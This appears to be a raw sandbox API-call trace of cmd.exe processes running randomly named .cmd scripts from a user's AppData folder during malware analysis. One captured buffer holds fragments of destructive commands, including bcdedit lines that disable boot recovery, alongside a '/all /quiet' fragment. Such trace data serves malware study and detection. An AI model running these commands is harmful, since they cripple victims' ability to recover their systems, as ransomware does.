_BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0210.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.611] GetFileType (hFile=0x7) returned 0x2 [0210.611] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0210.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.611] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0210.612] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0210.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.612] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0210.612] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0210.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.612] GetFileType (hFile=0x7) returned 0x2 [0210.612] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.612] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0210.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.612] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0210.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.612] GetFileType (hFile=0x7) returned 0x2 [0210.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480ff8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x480ff8*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0210.613] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" CiOHhXJTCFVtKQz1Zuv ") returned 21 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] GetFileType (hFile=0x7) returned 0x2 [0210.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x15) returned 1 [0210.613] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0210.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.613] GetFileType (hFile=0x7) returned 0x2 [0210.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0210.614] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.614] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0210.614] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0210.614] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0210.614] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0210.614] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0210.614] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0210.614] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0210.614] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0210.614] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0210.614] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0210.614] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0210.614] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.614] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0210.614] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.614] GetFileType (hFile=0x7) returned 0x2 [0210.614] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.614] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0210.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.615] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0210.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.615] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.615] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.615] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.615] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.615] SetConsoleInputExeNameW () returned 0x1 [0210.615] GetConsoleOutputCP () returned 0x1b5 [0210.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.616] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0210.616] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0210.616] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.616] SetFilePointer (in: hFile=0x58, lDistanceToMove=570, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23a [0210.616] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.616] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23a [0210.616] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x2, lpOverlapped=0x0) returned 1 [0210.616] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=2, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="\r\nho CiOHhXJTCFVtKQz1Zuv\r\ns /all /quiet\r\nll /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 2 [0210.616] _tell (_FileHandle=3) returned 572 [0210.616] _close (_FileHandle=3) returned 0 [0210.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0210.616] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0210.616] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: hFile=0x58, lDistanceToMove=572, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x0, lpOverlapped=0x0) returned 1 [0210.617] GetLastError () returned 0x0 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] GetFileType (hFile=0x58) returned 0x1 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f68c, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f68c*=0x0, lpOverlapped=0x0) returned 1 [0210.617] GetLastError () returned 0x0 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] GetFileType (hFile=0x58) returned 0x1 [0210.617] _get_osfhandle (_FileHandle=3) returned 0x58 [0210.617] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23c [0210.617] longjmp () [0210.617] _tell (_FileHandle=3) returned 572 [0210.617] _close (_FileHandle=3) returned 0 [0210.617] CmdBatNotification () returned 0x0 [0210.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.617] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.618] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.618] SetConsoleInputExeNameW () returned 0x1 [0210.618] GetConsoleOutputCP () returned 0x1b5 [0210.618] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.618] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.618] exit (_Code=0) Process: id = "60" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xe9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0xdf4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8629 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8630 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8631 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8632 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8633 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8634 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8635 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8636 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8637 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 8638 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8875 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8876 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8877 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8878 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8879 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 8880 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8881 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8882 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8883 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8884 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8885 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8886 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8887 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8888 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8889 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 8890 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8891 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8892 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8893 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8894 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 8895 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8896 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 8897 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 8898 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 8926 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8927 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8928 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8929 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 8930 start_va = 0x12b0000 end_va = 0x157efff entry_point = 0x12b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 100 os_tid = 0xea0 [0117.827] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfc0c | out: lpSystemTimeAsFileTime=0x1cfc0c*(dwLowDateTime=0x83799120, dwHighDateTime=0x1d440a9)) [0117.827] GetCurrentProcessId () returned 0xe9c [0117.827] GetCurrentThreadId () returned 0xea0 [0117.827] GetTickCount () returned 0x27edf [0117.827] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfc04 | out: lpPerformanceCount=0x1cfc04*=17461665412) returned 1 [0117.828] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.828] __set_app_type (_Type=0x1) [0117.828] __p__fmode () returned 0x76b331f4 [0117.828] __p__commode () returned 0x76b331fc [0117.828] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.828] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.829] GetCurrentThreadId () returned 0xea0 [0117.829] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xea0) returned 0x38 [0117.829] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.829] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.829] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfb9c | out: phkResult=0x1cfb9c*=0x0) returned 0x2 [0117.829] VirtualQuery (in: lpAddress=0x1cfbd3, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.829] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfb6c, dwLength=0x1c | out: lpBuffer=0x1cfb6c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0117.829] GetConsoleOutputCP () returned 0x1b5 [0117.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.829] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.829] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.830] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.830] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.830] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.830] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.830] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.830] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.830] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.830] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.830] GetEnvironmentStringsW () returned 0x340150* [0117.831] FreeEnvironmentStringsW (penv=0x340150) returned 1 [0117.831] GetEnvironmentStringsW () returned 0x340150* [0117.831] FreeEnvironmentStringsW (penv=0x340150) returned 1 [0117.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceb0c | out: phkResult=0x1ceb0c*=0x40) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x0, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x0, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegCloseKey (hKey=0x40) returned 0x0 [0117.831] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceb0c | out: phkResult=0x1ceb0c*=0x40) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x40, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x1, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x0, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, lpData=0x1ceb18*=0x9, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x4, 